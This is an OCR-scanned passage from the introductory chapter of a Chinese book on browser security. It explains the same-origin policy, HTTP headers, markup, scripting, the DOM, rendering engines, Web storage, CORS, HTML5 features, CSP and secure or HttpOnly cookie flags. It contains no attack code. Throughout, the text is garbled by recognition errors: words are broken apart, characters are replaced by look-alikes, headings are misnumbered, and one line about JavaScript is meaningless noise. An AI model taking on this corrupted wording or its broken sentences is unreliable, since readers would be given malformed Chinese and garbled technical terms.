a 它 会 不 断 向 攻击 者 暴露 攻击 目标 。 它 会 在 后 台 静 默 更 新 。 
a 它 经 常会 依赖 搬 件 获得 某 些 功能 。 没 有 统一 的 机 制 更 新 这 些 搬 件 。 
此 外 ， 对 这 个 软件 的 相关 研究 表明 : 
O 插件 一 般 来 说 都 不 如 核心 软件 本 身 安全 ; 
口 这 个 软件 的 每 个 变 体 都 有 文档 载 明 的 漏洞 ; 
a 一 份 安全 情报 报告 ( Security Intelligence Report ) ! 得 出 结论 ， 说 这 个 软件 是 企业 最 大 的 
威胁 ?。 
显然 , 根据 以 上 描述 ， 你 一 定 知道 我 们 说 的 就 是 浏览 器 。 不 过 ， 再 次 请 你 忘掉 这 些 ， 以 及 相 
关 的 历史 事件 , 回 到 我 们 那 张 空白 的 安全 画布 面前 。 想 一 想 , 就 这 种 软件 的 部 署 量 居然 如 此 之 高 ， 
真 的 都 禁不住 要 怀疑 人 类 的 智商 了 。 不 论 通 过 它 获取 数据 有 多 方便 , 仅 从 其 设计 规格 来 看 ， 它 所 
面临 的 安全 风险 就 是 极其 巨大 的 。 
不 过 ， 回 到 现实 当中 , 以 上 所 有 说 法 都 是 纯 理 论 的 探讨 。 实 际 上 , 我 们 已 经 走 上 了 一 条 不 归 
路 。 如 今 互 联网 上 网 站 多 如 繁星 ， 谁 敢 因 为 浏览 器 有 重大 安全 隐患 ， 就 勒令 所 有 员工 伯 载 它 ? 或 
许 你 知道 ,浏览 器 的 装机 量 要 以 十 亿 计 。 不 让 员工 装 浏览 器 ， 无疑 会 降低 其 工作 效率 。 更 不 用 说 
这 个 措施 多 难 让 人 接受 ， 会 被 认为 是 开 历 史 倒 车 了 ! 
浏览 器 达到 了 前 所 未 有 的 使 用 量 , 取决 于 个 人 的 使 用 情况 , 也 暴露 出 了 各 种 各 样 的 问题 和 安 
全 挑战 。 对 很 多 不 搞 技术 的 人 来 说 ， 无 处 不 在 的 浏览 器 就 意味 着 “互联 网 ”。 浏 览 絮 只 能 展示 IP 
协议 ( Internet Protocol ) 所 能 理解 的 数据 。 在 互联 网 时 代 ， 浏 览 器 在 人 们 日 常生 活 中 的 地 位 是 不 
可 动 播 的 ，IT 行 业 的 发 展 也 与 它 密 不 可 分 。 
放眼 四 望 , 浏览 器 在 网 络 中 几乎 无 了 筷 不 人 。 用 户 网 中 有 它 ， 客 户 服 务 网 中 有 它 ， 甚 至 安全 禁 
区 (DMZ) 中 都 有 它 的 身影 。 不 要 忘 了 ， 很 多 情况 下 用 户 管理 员 必 须 使 用 浏览 器 来 管理 自己 负 
责 的 网 络 设备 。 网 络 设备 三 商都 在 顺应 Web 大 潮 ， 努 力 利用 浏览 器 无 所 不 在 的 现实 ， 而 不 会 考虑 
重新 发 明 轮 子 。 
人 们 对 通过 浏览 器 上 网 的 依赖 是 毫 无 疑问 的 。 实际 上 , 与 其 问 自 己 在 哪里 能 看 到 浏览 器 , 倒 
不 如 问 自己 在 哪里 看 不 到 它 。 
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1.2 揭 密 浏览 器 


你 在 上 网 的 时 候 ， 网 也 会 接触 你 。 事实 上 ,无 论 你 是 否 能 意识 到 ， 应 该 说 每 次 都 是 你 主动 邀 
请 它 跟 你 亲密 接触 的 。 正 是 你 , 带 着 它 穿 过 那些 则 在 保护 你 的 网 络 安全 的 重重 关卡 ， 并 执行 那些 
只 有 你 的 最 高 权限 才能 控制 的 指令 , 一 切 都 以 演 染 网 页 为 名 , 把 根本 就 不 了 解 甚至 不 能 信任 的 内 
容 呈现 于 屏幕 之 上 。 

浏览 器 需要 从 操作 系统 获得 一 些 特权 才能 运行 , 这 一 点 与 用 户 空间 中 的 其 他 程序 一 样 。 这 些 
特权 都 是 由 你 一 一 也 就 是 所 谓 的 用 户 一 一 亲自 授予 的 ! 用 户 输入 是 什么 ? 不 就 是 你 向 当前 程序 发 
出 的 一 些 指 令 嘛 ， 而 这 个 程序 可 能 是 Windows 的 资源 管理 带 ， 也 可 能 是 UNIX 的 命令 行 客户 端 。 
用 户 输入 和 其 他 来 源 输 入 的 唯一 差别 ， 就 是 程序 在 接收 该 输入 时 所 体现 的 不 同方 式 。 

同样 的 认识 可 以 应 用 到 浏览 需 上 。 浏 览 需 的 主要 功能 就 是 从 外 部 世界 的 任意 位 置 获取 并 执行 
BS, ， 而 与 它 的 这 一 行为 相关 的 潜在 风险 是 显而易见 的 。 


1.2.1 与 Web 应 用 休 威 与 共 


Web 所 采用 的 客户 端 一 服务 器 模型 发 端 于 20 世 纪 70 年 代 。 客 户 端 与 服务 器 通信 使 用 的 是 请 
求 一 响应 “的 方式 ， 即 浏览 器 负责 发 送 请 求 ， 服 务 器 负责 给 出 响应 。 

服务 器 和 客户 端 必须 相互 依赖 ， 才 能 发 挥 自己 最 大 的 潜能 。 可 以 说 ,它们 俩 完全 是 一 个 “ 命 
运 共同 体 ”: 没有 服务 器 ， 浏 览 器 什么 也 看 不 到 ， 而 没有 浏览 器 ， 服 务 器 的 内 容 也 不 知道 要 交 给 
谁 。 这 种 共生 的 关系 是 Web 上 不 计 其 数 的 复杂 关系 的 源头 。 

这 两 个 Web 组 件 之 间 的 紧密 关系 ， 同 样 也 带 来 了 安全 问题 。Web 浏 览 句 的 安全 会 影响 Web 应 
用 的 安全 , 反之 亦 然 。 某 些 组 件 在 独立 的 情况 下 可 以 保证 安全 , 但 更 多 的 时 候 则 要 视 另 外 一 方 的 
情况 而 定 。 一 般 来 说 ,浏览 需 与 应 用 之 间 的 联结 点 是 最 需要 保护 的 ; 从 攻击 者 角度 说 ,这 些 联结 
点 也 是 主要 攻击 目标 。 举 个 例子 ， 服 务 需 在 设 定 茶 个 特定 来 源 的 cookie 时 ， 它 和 希望 浏览 圳 能 尊重 
该 指令 ， 而 不 要 向 其 他 来 源 泄 露 这 个 〈 可 能 比较 敏感 的 ) cookie. 

浏览 絮 与 Web 应 用 关联 所 带 来 的 安全 问题 需要 全 面 的 认识 。 很 多 情况 下 ， 我们 的 讨论 都 必须 
涉及 这 两 大 组 件 之 间 的 交互 。 而 利用 它们 之 间 的 关系 ， 正 是 本 书 接 下 来 所 有 章 的 使 命 。 

当然 ,我 们 也 鼓励 大 家 不 要 就 此 止步 ,还 应 该 进一步 探索 Web 应 用 可 能 遭遇 的 种 种 威胁 。 
在 这 里 向 初学 者 和 有 经 验 的 安全 专业 人 士 推荐 一 本 书 ,《 黑 客 攻 防 技术 宝典 : Web 实 战 篇 (第 
2 版 )》"。 


1.2.2 同 源 策略 


浏览 嚣 中 最 重要 的 安全 措施 就 是 同 源 策 略 ( Same Origin Policy, SOP )。 同 源 策 略 用 于 限制 
不 同 来 源 的 资源 之 间 的 交互 。 



















































































































































































(D 此 书 已 由 人 民 由 
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同 源 策略 的 含义 就 是 对 于 不 同 的 页 面 ， 如 果 它 们 的 主机 名 、 协 议和 端口 都 相同 , 那 它 们 就 是 
同一 来 源 的 。 如 果 上 述 三 个 属性 中 有 任何 一 个 不 一 样 , 那 就 不 能 算是 同 源 了 。 而 同一 来 源 的 资源 ， 
即 主 机 名 、 协 议和 端口 都 相同 的 资源 之 间 的 交互 ， 是 不 受 限制 的 。 

最 初 ， 同 源 策 略 只 适用 于 外 部 资源 ， 后 来 才 扩 展 到 包含 其 他 来 源 的 资源 。 比 如 ， 使 用 file:// 
协议 访问 本 地 文件 ,使 用 chrome:// 协 议 访问 浏览 器 相关 的 资源 等 。 除 了 这 两 个 协议 之 外 ,现在 的 
浏览 器 还 支持 其 他 一 些 协议 。 














1.2.8 HTTP 首部 


可 以 把 HTTP 首 部 想象 成 写 在 信封 上 的 地 址 和 其 他 相关 说 明 ， 它 们 描述 的 是 它们 封装 的 包 应 
该 发 往 何 处 ， 以 及 接收 方 该 如 何 处 理 包 中 的 内 容 。 

在 邮政 包 庄 上 ， 我 们 常常 可 以 看 到 这 样 的 说 明 :“ 易 碎 物品 ， 小 心 轻 放 ”“ 此 面 彰 上 ”“ 和 危险 
nn, 易 爆 炸 !”。 HTTP 数 据 包 前 头 的 HTTP 首 部 与 此 类 似 。 HTTP 首 部 是 HTTP 协 议定 义 的 原初 指令 ， 
用 于 指示 接收 方 怎么 处 理 其 后 的 内 容 。Web 客 户 端 要 在 所 有 请 求 的 开头 提供 HTTP 首部 ， 而 Web 
服务 器 也 要 在 任何 响应 的 开头 附 上 HTTP 首 部 。 

首部 内 容 决定 了 接收 方 ( 可 能 是 服务 器 ， 也 可 能 是 浏览 器 ) 如 何 处 理 被 发 送 的 内 容 。 对 于 特 
定 的 交互 而 言 ， 有 些 首部 字段 是 必需 的 , 有些 首部 字段 是 可 选 的 ， 而 另外 一 些 首部 字段 则 纯粹 是 
为 了 提供 额外 信息 用 的 。 



















































































1.24 ”标记 语言 


标记 语言 是 一 种 描述 如 何 显示 内 容 的 方式 。 具体 来 说 , 标记 语言 为 在 同一 文档 中 创建 数据 占 
位 符 以 及 数据 相关 注释 的 占 位 符 给 出 了 标准 的 方式 。 我们 目 力 所 及 的 几乎 任何 一 个 网 页 都 可 能 使 
用 了 标记 语言 ， 而 标记 语言 负责 告诉 浏览 带 怎 么 把 页 面 显 示 给 我 们 。 

标记 语言 也 分 很 多 种 。 有 些 标记 语言 应 用 很 广 ， 有 些 则 没有 那么 通用 , 但 每 种 标记 语言 都 有 
自己 擅长 和 不 擅长 的 使 用 场景 。 不 用 说 大 家 也 知道 ，Web 浏 览 器 使 用 的 标记 语言 是 HTML。 

1. HTML 

HTML， 即 HyperText Markup Language ( 超 文 本 标记 语言 )， 是 一 种 常用 的 编程 语言 ， 主 要 
用 于 告诉 浏览 絮 如 何 显 示 网 页 。HTML 源 于 SGML ( Standard Generalized Markup Language， 标 准 
通用 标记 语言 )， 经 过 多 年 发 展 , 已 经 有 了 非常 大 的 变化 。 

对 标记 语言 (数据 与 注释 或 指令 并 存 ) 的 依赖 ， 是 一 些 重要 、 持 久 和 系统 的 安全 问题 的 根源 
所 在 。 本 书后 面 还 会 详细 讲 到 HTML， 以 及 它 的 众多 特性 。 

2. XML 

XML 与 HTML 的 关系 非常 密切 。 如 果 你 熟悉 HTML， 那 么 掌握 XML 不 会 太 难 。 虽 然 在 人 类 
眼 里 ， 它 们 谁 也 长 得 不 怎么 好 看 ， 但 它们 却 非常 擅长 表示 复杂 的 数据 。XML 也 是 Web 上 常用 的 
一 种 标记 语言 ， 最 常用 的 情形 是 把 它 作 为 Web 服 务 之 间 (或 者 通过 远程 过 程 调用 ) 交换 数据 的 
标准 格式 。 
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1.2.5 CSS 


CSS， 即 cascading style sheets ( 层 琶 样式 表 )， 是 浏览 器 为 网 页 内 容 指定 样式 的 主要 方法 。 注 
BE, 不 是 XSS。XSS 指 的 是 cross-site scripting， 即 跨 站 点 脚本 攻击 。 

CSS 提 供 了 一 种 把 网 页 内 容 与 样式 分 离 的 机 制 。CSS 能 干什么 ? 举 个 简单 的 例子 ， 它 可 以 把 
一 段 话 显示 为 粗 体 。 当 然 ，CSS 的 功能 远 比 这 要 强大 多 了 ， 通 过 它 可 以 实现 各 种 复杂 的 样式 。 


1.2.6 ”脚本 


Web 脚 本 语言 是 一 门 值得 学 习 的 艺术 。 如 果 你 想 搞 Web 技 术 ， 那 迟早 要 掌握 脚本 语言 。 总 体 
来 说 ， 脚 本 编程 是 在 浏览 器 中 实现 Web 开 发 必 备 的 技能 。 

本 书后 面 会 讲 到 攻击 者 使 用 脚本 利用 浏览 器 的 各 种 漏洞 ， 包 括 XSS。 因 此 ， 你 必须 对 脚本 编 
程 有 所 了 解 。 

1. JavaScript 

JavaScript $F PRG Za P FIL TT RIDGE d Zu fe o RS PI Java i P] , JavaScriptze 3928 81 
JavaScript 在 Web 开 发 的 当下 和 可 见 未 来 ， 都 是 统治 性 的 语言 。 所 有 浏览 器 默认 的 脚本 语言 都 是 
JavaScript. 

作为 本 书 读者 , 你 必须 有 JavaScript 编 程 经 验 ， 因为 书 中 大 部 分 代码 示例 都 是 用 它 写 的 。 使 用 
JavaScript 编 写 的 攻击 脚本 ， 也 是 可 以 跨 浏览 器 运行 的 (但 不 排除 会 受 个 别 浏览 器 奇怪 特性 的 影 
响 )。 不管 怎么 说 ，JavaScript 都 是 探查 浏览 器 漏洞 必 备 的 语言 。 

2. VBScript 

VBScript 只 有 微软 的 浏览 器 才 支 持 ， 而 且 在 真正 的 Web 开 发 中 几乎 没 人 用 了 。 这 主要 是 因为 
不 是 所 有 浏览 器 都 支持 它 ， 而 它 也 是 微软 早期 为 了 与 网 景 公 司 的 JavaScript 抗 衡 才 开发 出 来 的 。 

VBScript 的 很 多 功能 都 可 以 使 用 JavaScript 完 成 。 显 然 ， 有 人 就 会 问 了 ，VBScript 还 有 必要 存 
在 吗 ? 确实 如 此 ， 即 便 微软 还 继续 支持 它 ， 那 也 只 能 把 它 作 为 对 下 过 去 辉煌 的 一 种 缅怀 而 已 。 





































































































































































































1.2.7 DOM 


DOM， 即 document object model ( 文档 对 象 模 型 )， 是 浏览 器 中 的 一 个 基础 性 概念 。DOM 是 
在 浏览 器 中 操作 HTML 或 XML 文档 的 API， 使 用 脚本 语言 可 以 通过 DOM 提 供 的 对 象 操 作 HTML 
元 素 。 

DOM 是 为 JavaScript 这 样 的 脚本 语言 而 定义 的 。DOM 规 范 定 义 了 通过 脚本 操作 实时 文档 的 方 
法 ， 即 浏览 器 中 运行 的 脚本 可 以 动态 读 取 或 修改 网 页 内 容 。 这 样 一 来 ,网 页 可 以 不 经 过 服务 器 就 
更 新 自己 的 内 容 ， 而 且 也 不 用 用 户 参 与 。 


1.2.8 泻 染 引擎 
i& 4 5| 3€ (rendering engine ) 在 浏览 器 里 有 很 多 不 同 的 称呼 ， 比 如 布局 引擎 (layout engine ) 
































或 浏览 器 引擎 (web browser engine ) ”。 本 书 不 区 分 这 些 名 字 ， 将 它们 视 为 意思 相同 。 

渲染 引擎 是 浏览 器 的 核心 组 件 , 负责 把 数据 转换 为 用 户 在 屏幕 上 可 以 看 到 的 样式 。 浏览 器 可 
以 把 HTML 、 图 片 和 CSS 综 合 起 来 ， 共 同 决定 用 户 在 浏览 器 中 看 到 的 最 终 产 品 是 什么 样子 。 正 是 
这 些 引擎 让 用 户 能 够 看 到 图 形 。 说 到 网 形 , 实际 上 也 有 只 解析 文本 的 泻 染 引擎 , 比如 Lynx 和 W3M。 

Web 上 的 演 染 引擎 有 很 多 种 "。 本 书 涉及 的 图 形 演 染 引擎 包括 WebKit、Blink 、Trident 和 Gecko。 

1. WebKit 

WebKit 是 最 受 欢 迎 的 泻 染 引擎 ， 很 多 浏览 器 都 在 用 。 最 著名 的 是 苹果 的 Safari， 还 有 以 前 的 
谷歌 Chrome 也 用 过 它 。 应 该 说 ，WebKit 是 当今 最 流行 的 泻 染 引 警 之 一 ”。 

WebKit 是 一 个 开源 项 目 ， 它 的 目标 是 成 为 通用 的 软件 应 用 程序 交互 与 展示 引擎 *。 除 了 在 浏 
览 器 中 使 用 ， 还 有 邮件 客户 端 和 即时 通信 系统 也 在 使 用 它 。 

2. Trident 

Trident 是 微软 开发 的 泻 染 引擎 , 也 叫 MSHTML IE 使 用 的 Trident 是 闭 源 的 , 这 一 点 不 难 想见 。 
Trident 算 是 第 二 流行 的 泻 染 引擎 。 

与 WebKit 类 似 ，Trident 也 被 用 于 浏览 器 之 外 的 软件 中 ， 比 如 Google Talk。 软 件 可 以 通过 调用 
Windows 系 统 中 的 mshtml.dll 动 态 链 接 库 来 使 用 这 个 引擎 。 

Trident 首 次 出 现在 Internet Explorer 的 第 四 个 版 本 中 ， 一 直 非 常 稳定 。 微 软 最 新 的 下 至 今 还 使 
用 Trident 作 为 核心 泻 染 引擎 。 

3. Gecko 

Firefox 是 使 用 Gecko 开 源 泻 染 引 擎 的 最 主要 的 软件 .Gecko 应 该 是 排 在 WebKit 和 Trident 之 后 位 
居 第 三 的 泻 染 引擎 。 

Gecko 是 网 景 公 司 20 世 纪 90 年 代为 其 浏览 器 Netscape Navigator 开 发 的 一 个 演 染 引擎 。 目 前 ， 
Gecko 主 要 用 在 Mozilla 基 金 会 和 Mozilla 公 司 开发 的 一 些 应 用 中 ， 最 主要 的 就 是 Firefox 浏 览 需 

4. Presto 

Presto (在 本 书写 作 时 ) 是 Opera 的 泻 染 引擎 。 但 Opera 团 队 在 2013 年 宣布 将 很 快 放弃 其 自家 
的 Presto ， 迁 移 至 WebKit Chromium’, WebKit Chromium 后 来 改名 为 Blink ( 后 面 会 介绍 )。 

一 个 主流 浏览 器 如 此 巨大 地 切换 路 线 ， 应 该 说 是 前 所 未 有 的 。 而 且 ， 这 样 一 来 ，Presto 注 定 
会 消亡 ， 成 为 浏览 器 大 战 的 牺牲 品 。 

5. Blink 

2013 年 ， 谷 歌 宣布 从 WebKit 分 文 出 来 ， 创 建 了 新 的 Blink 泻 染 引 擎 。Blink 最 初 致力 于 更 好 地 
支持 Chrome 的 多 进程 架构 ， 降 低 该 浏览 器 的 内 部 复杂 度 。 这 个 泻 染 引擎 能 否 像 WebKit 那 样 走向 
辉煌 ， 我 们 可 以 拭目以待 。 但 谷歌 关于 削减 其 不 必要 功能 的 提议 ， 确 实 是 一 个 好 兆头 。 




























































































































































































1.2.9 Geolocation 


Geolocation API 是 为 移动 和 桌面 浏览 器 访问 设备 地 理 位 置信 息 而 开发 的 。 该 API 可 以 通过 
GPS、 蜂 窜 小 区 三 角 测 量 、IP 地 理 定位 和 本 地 Wi-F 热 点 取得 地 理 位 置信 息 。 
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现实 世界 中 有 很 多 小 用 地 理 位 置信 息 的 例子 。 为 此 ， 浏 览 器 也 增加 了 很 多 严密 的 安全 措施 ， na 
使 得 攻击 的 主要 方法 只 剩 社会 工程 了 。 后 面 几 章 还 会 继续 讨论 这 个 话题 。 





1.2.10 Web 存储 


Web 存储 ( Web storage) 又 称 DOM 存储 (DOM storage )， 原 来 是 HTML5 规 范 的 一 部 分 ， 现 
在 已 经 剥离 出 来 。 可 以 把 Web 存 储 看 成 超级 cookie。 

与 cookie 类 似 ，Web 存储 有 两 种 存储 机 制 : 一 种 可 以 将 数据 持久 保存 在 本 地 ， 男 一 种 只 在 会 
话 期 间 保存 数据 。 具 体 来 说 ， 本 地 存储 ( local storage) 负责 存储 持久 数据 ， 用 户 多 次 访问 都 可 以 
存 取 ; 会 话 存储 (session storage ) 负责 存储 会 话 数据 ， 只 在 创建 该 数据 的 标签 页 内 有 效 。 

cookie 与 Web 存 储 的 一 个 主要 区 别 , 就 是 只 有 JavaScript 可 以 创建 Web 存 储 ，HTTP 首 部 不 行 
了 ， 而 且 Web 存 储 中 的 数据 也 不 会 随 请 求 发 送 给 服务 器 。Web 存 储 的 数据 量 也 比 以 往 的 cookie 
多 得 多 , 但 也 因 浏 览 器 而 异 , 不 过 至 少 也 有 5 MB 。 另 一 个 主要 区 别 就 是 本 地 存储 没有 所 请 的 路 
径 限 制 。 


会 话 存储 
下 面 是 一 个 使 用 Web 存储 API 的 简单 例子 。 在 浏览 器 JavaScript 控 制 台中 运行 以 下 命令 , 就 
可 以 在 当前 标签 页 的 会 话 存储 中 保存 一 个 "BHH" 值 : 


sessionStorage.setItem("BHH", "http://browserhacker.com") ; 
sessionStorage.getItem("BHH") ; 






































同 源 策略 也 适用 于 本 地 存储 , 而 且 每 个 来 源 都 会 分 开 。 其 他 来 源 的 资源 不 能 访问 当前 的 本 地 
存储 ， 子 域 也 不 行 "。 


1.2.41 ” 跨 域 资源 共享 


跨 域 资源 共享 ， 即 CORS ( cross-origin resource sharing ), 是 一 个 让 来 源 忽 略 同 源 策略 的 规范 。 
在 最 宽松 的 配置 下 ，Web 应 用 可 以 通过 XMLHttpRequest 蜂 域 访问 任何 资源 。 服 务 器 通过 HTTP 
首部 通知 浏览 器 它 是 否 接受 访问 。 

CORS 的 一 项 核心 内 容 就 是 给 Web 服 务 咒 的 HTTP 啊 应 首部 增加 了 以 下 字段 : 


Access-Control-Allow-Origin: * 
Access-Control-Allow-Methods: POST, GET 


如 果 浏 览 器 向 某 服务 器 发 送 了 跨 域 XMLHttpRequest 请 求 , 而 该 服务 器 的 响应 首部 并 不 包含 
以 上 字段 ， 则 这 个 跨 域 请 求 就 会 失败 ， 即 不 能 访问 该 服务 器 响应 的 内 容 。 这 其 实 就 是 与 同 源 策略 
一 致 。 然 而 ， 如 果 Web 服 务 器 返回 了 前 面 的 首部 ， 那 么 现代 浏览 吉 就 会 遵循 CORS 规 范 ， 人 允许 对 
该 来 源 啊 应 内 容 的 访问 。 
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1.2.12 HTML5 


HITML5 是 未 来 ， 其 实 更 应 该 说 是 现在 。 虽 然 这 个 标准 还 在 发 展 ， 但 现代 浏览 器 已 经 实现 其 
核心 功能 。 你 现在 使 用 的 浏览 器 很 可 能 已 经 支持 HTML5 的 很 多 功能 

HTML5 是 HTML 的 新 版 本 ， 大 幅 增 强 了 原 有 功能 ， 进 而 增强 了 用 户 体验 。 

从 安全 角度 来 说 ， 最 明显 的 变化 就 是 攻击 面 增 大 了 。HTML5 新 增 的 很 多 方法 暴露 了 HTML4 
没有 暴露 过 的 漏洞 。 当 然 , 这 样 一 样 可 用 的 功能 也 增多 了 。 结果 就 是 被 成 功 攻击 的 风险 也 增 大 了 。 
但 这 是 任何 技术 进步 都 不 可 避免 的 ， 不 能 成 为 HTML 停滞 不 前 的 理由 。 

本 书 会 涵盖 HTML5 的 一 些 新 功能 ， 但 不 完整 。 本 节 后 面 会 简单 介绍 攻击 中 可 以 利用 的 新 
功能 。 

1. WebSocket 

WebSocket 是 一 种 浏览 器 技术 ， 利 用 它 可 以 在 浏览 器 与 服务 器 之 间 打 开 一 条 即时 响应 的 全 双 
工 信 道 。 这 样 一 来 ， 不 使 用 服务 器 轮 询 也 可 以 实现 高 标准 的 事件 驱动 系统 。 

WebSocket 蔡 代 了 Comet 等 基于 Ajax 的 服务 器 端 推 送 技术 。 但 Comet 需 要 客户 端 库 ， 
WebSocket API 则 完全 是 现代 浏览 器 中 的 本 地 技术 。 包 括 IE10 在 内 的 所 有 现代 浏览 器 都 原生 支持 
WebSocket， 只 有 Opera Mini 和 安 卓 的 原生 浏览 器 例外 。 

2. Web Worker 

Web Worker 之 前 的 JavaScript 代 码 都 是 单线 程 执行 的 。 而 要 想 实 现 并 发 ， 开 发 者 就 要 依赖 
setTimeout () 和 setInterval ()。 

HTML5 新 增 了 Web Worker， 可 以 看 作 在 浏览 器 后 台 运 行 的 线程 。 有 两 种 Web Worker: 一 种 
可 以 在 同一 来 源 的 资源 间 共 享 ， 另 一 种 只 能 与 创建 它 的 函数 通信 。 

虽然 这 个 API 了 世 有 一 些 局 限 ， 但 仍然 给 开发 人 员 提 供 了 更 多 的 灵活 性 。 当 然 ， 攻 击 者 因此 也 
有 了 更 多 方式 对 浏览 器 发 起 攻击 。 

3. 操作 历史 

本 书 也 会 讨论 很 多 种 针对 Web 浏 览 器 历史 功能 发 起 的 攻击 。 历 史 功 能 随 着 浏览 器 的 变化 ,也 
在 不 断 发 展 变 化 。 

以 前 , 浏览 器 只 要 跟踪 用 户 点 了 哪个 链接 才 跳 到 新 页 面 就 行 了 。 今天 ， 点 击 链接 可 能 会 导致 
脚本 执行 并 演 染 页 面 ， 而 这 被 视 为 用 户 体 验 的 一 个 重要 里 程 碑 。 

HTML5 提 供 了 操作 历史 记录 的 很 多 方法 。 使 用 历史 对 象 ， 脚 本 可 以 添加 或 删除 位 置 ， 也 可 
以 在 历史 链 中 辐 前 或 向 后 移动 当前 页 面 。 

4. WebRTC 

WebRTC， 即 Web Real-Time Communication ( Web 实 时 通信 )， 是 HTML5 运 用 JavaScript 能 力 
的 一 个 进步 。 使 用 WebRTC 可 以 实现 浏览 器 之 间 的 互相 通信 ， 而 且 延 迟 很 低 ， 但 要 实现 富 媒 体 的 
实时 交互 ， 必 须 有 高 带宽 支持 。 
在 本 书写 作 时 ， 支 持 WebRTC 的 浏览 器 有 最 新 版 本 的 Chrome FirefoxfllOpera, ix HE} Và as 
都 原生 支持 WebRTC。WebRTC 的 功能 包括 直接 访问 相机 和 音频 设备 ( 用 来 支持 视频 会 议 )。 这 种 
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实用 但 很 容易 被 侵入 的 技术 显然 也 会 面临 很 多 潜在 的 安全 威胁 。 好 在 WebRTC 是 一 个 开源 的 标 
准 ， 要 想 实 现 透 明 分 析 并 不 困难 。 








1.2.13 ”隐患 


“隐患 ”( vulnerability ) 这 个 词 指 代 一 个 抽象 因而 又 很 复杂 的 主题 。 不 难 想 见 , 我 们 之 所 以 写 
作出 版 这 本 书 ， 正 是 因为 浏览 器 有 所 谓 的 “隐患 ”存在 。 可 是 ， 什 么 是 隐患 ， 什 么 又 不 是 ,三 言 
两 语 也 讲 不 清楚 。 有 时 候 ,隐患 原本 是 一 个 规 规矩 矩 的 功能 , 但 后 来 却 有 人 发 现 这 个 功能 权限 太 
宽松 ， 于 是 这 项 功能 就 成 了 隐患 。 

更 让 人 摸 不 着 头脑 的 是 ， 某 些 隐患 有 很 多 叫 法 ， 叫 来 叫 去 ， 非 常 容易 混淆 。 为 了 清晰 起 见 ， 
本 书 所 说 的 隐患 指 的 都 是 容易 被 人 攻击 的 意思 。 

关于 利用 编译 后 代码 中 的 隐患 , 也 有 很 多 相关 图 书 。 本 书 内 容 与 这 些 书 不 一 样 , 主要 关注 浏览 
带 安 全 这 个 主题 。 但 浏览 带 安 全 这 个 话题 ,一 本 书 很 难 面 面 俱 到 ， 其 至 一 书架 书 怒 怕 都 难以 穷尽 ! 

如 果 有 读者 对 利用 编译 后 代码 中 的 隐患 感 兴趣 ,可 以 找 一 本 《黑客 攻防 技术 宝典 ， 系统 实战 
篇 (第 2 版 )》 看 看 。 男 外 ， 所 有 对 黑客 攻防 感 兴趣 的 读者 ， 都 应 该 涉足 源 代码 利用 技术 ， 因 为 这 
个 领域 实在 太 有 意思 了 。 


1.3 发 展 的 压力 


在 IT 领域 ，Web 浏 览 器 经 历 过 的 巨变 非常 激动 人 心 。 今 天 的 浏览 器 在 性 能 、 安 全 和 开发 等 方 
面 都 应 用 了 最 先进 的 技术 ， 在 极为 激烈 的 竞争 中 面临 着 生 与 死 的 考验 。 

浏览 器 过 去 一 度 属于 比较 简单 的 软件 。 第 一 个 浏览 器 的 用 途 只 有 一 个 : 显示 萌芽 时 期 的 Web 
和 跟踪 超 链 接 。 而 今 ， 它们 已 经 支持 扩展 、 插 件 、 相 机 、 话 简 和 地 理 定位 了 。 无 需 多 言 ， 浏览 融 
已 经 发 展 成 为 一 款 极度 复杂 的 软件 。 

在 浏览 器 五 彩 斑 壮 的 历史 长 河中 ,总 是 你 方 唱 黑 我 登场 ， 热 闹 非 凡 。 有 赢家 ， 也 有 输家 ， 有 
小 众 的 最 爱 ,也 有 大 众 的 选择 ,而 且 各 家 浏览 器 的 声望 也 是 此 起 彼 伏 。 网 景 公司 是 浏览 器 战争 的 
早期 阵亡 者 , 但 它 的 失败 却 催生 了 Mozilla 以 及 Firefox。 曾经 雄霸 浏览 器 市 场 并 击败 网 景 的 老 资 格 
的 了 下 ， 如 今 也 江河 日 下 ， 先 是 被 开源 浏览 需 重 创 ， 后 来 又 被 谷歌 Chrome 和 苹果 Safari 等 商业 产品 
攻 城 掠 地 。 然 而 ， 由 于 仍然 不 断 进步 ， 加 上 财 大 气 粗 的 微软 极力 扶持 ， 正 还 在 生存 和 发 展 。 可 以 
说 ,浏览 器 之 争 远 远 没有 到 落幕 的 时 候 。 

战场 已 经 转移 , 浏览 器 纷纷 开辟 新 的 疆 土 。 互相 竞争 的 一 个 结果 ,就 是 浏览 器 提供 商 意识 到 
安全 对 用 户 的 重要 性 ， 使 得 攻击 浏览 器 的 难度 与 日 俱 增 。 这 主要 表现 在 防御 技术 的 不 断 进 步 上 。 

接 下 来 ， 我 们 简要 介绍 一 些 当今 浏览 需 在 强化 防御 方面 的 安全 特性 。 






































































































































1.3.1 HTTP 首部 
HTTP 首 部 增加 了 很 多 安全 特性 。 因 为 关于 请 求 和 响应 的 指令 都 放 在 HTTP 首 部 ,所 以 服务 器 
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通过 它 来 指示 浏览 器 加 强 安全 防卫 是 自然 而 然 的 。 

1. 内 容 安全 策略 

关于 XSS 的 内 容 将 在 第 2 章 详细 讨论 ， 这 里 为 了 解释 清楚 CSP (Content Security Policy， 内 
容 安 全 策略 )， 需 要 简单 提 及 它 。CSP 是 为 了 降低 XSS 隐 患 而 诞生 的 ， 为 此 它 定义 了 指令 与 内 容 
的 差别 。 

服务 器 会 发 送 CSP HTTP 首 部 Content-Security-Policy 或 X-Content-Security-Policy， 以 规定 可 
以 从 哪里 加 载 脚本 ， 同 时 还 规定 了 对 这 些 脚本 的 限制 ， 比 如 是 否 允许 执行 JavaScript 的 eval () 
PRIA, 

2. 安全 cookie 标 志 

过 去 ，HTTP 和 HTTPS 都 可 以 发 送 cookie， 不 会 加 以 区 分 。 但 这 样 有 可 能 影响 与 浏览 器 建立 
的 会 话 的 安全 性 。 通 过 HTTPS 建 立 的 安全 会 话 暗 号 (token) 有 可 能 被 攻击 者 通过 标准 HTTP 请 求 
获取 。 

这 就 是 secure cookie 标 志 希 望 一 跳 而 就 解决 的 问题 。 这 个 标志 的 主要 目的 就 是 告诉 浏览 器 不 
要 通过 任何 不 安全 的 渠道 发 送 cookie， 从 而 确保 敏感 的 会 话 暗号 无 论 何 时 何 地 都 处 于 安全 保护 之 
中 。 

3. HttpOnly cookie 标 志 

HttpOnly 是 男 一 个 应 用 给 cookie 的 标志 ， 而 且 所 有 现代 浏览 器 都 支持 它 。HttpOnly 标 志 的 用 
途 是 指示 浏览 器 禁止 任何 脚本 访问 cookie 内 容 , 这 样 就 可 以 降低 通过 JavaScript 发 起 的 XSS 攻 击 ( 详 
见 第 2 章 ) 偷 取 cookie 的 风险 。 

4. X-Content-Type-Options 

